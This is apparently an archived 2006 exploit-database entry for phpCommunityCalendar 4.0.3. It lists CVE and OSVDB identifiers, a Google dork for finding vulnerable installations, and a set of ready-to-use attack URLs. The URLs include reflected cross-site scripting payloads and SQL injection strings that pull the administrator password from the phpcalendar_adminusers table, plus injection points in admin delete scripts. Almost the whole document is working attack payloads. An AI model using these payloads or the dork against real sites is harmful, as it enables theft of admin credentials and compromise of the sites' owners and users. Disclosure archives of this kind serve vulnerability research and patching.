phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection
Author: X0r_1
type: webapps
platform: php
port:
date_added: 2006-05-22
date_updated:
verified: 1
codes: OSVDB-31693;CVE-2006-2798;OSVDB-31692;OSVDB-31691;OSVDB-31066;OSVDB-31065;OSVDB-31064;OSVDB-31063;OSVDB-31062;CVE-2006-2797;OSVDB-31061;OSVDB-31060
tags:
aliases:
screenshot_url:
application_url:
##################################################################################
#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<#
##################################################################################
# #
# phpCommunityCalendar 4.0.3 Multiple Vulnerabilites #
# #
##################################################################################
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>#
##################################################################################
# #
# author : X0r_1 #
# release : 23.05.06 #
# software : http://www.appideas.com/ #
# googledork : "Calendar programming by AppIdeas.com" filetype:php #
# #
##################################################################################
XSS:
http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script>
http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script>
http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><"
SQL Injections:
http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]
http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]
http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]
http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]
http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]
# milw0rm.com [2006-05-23]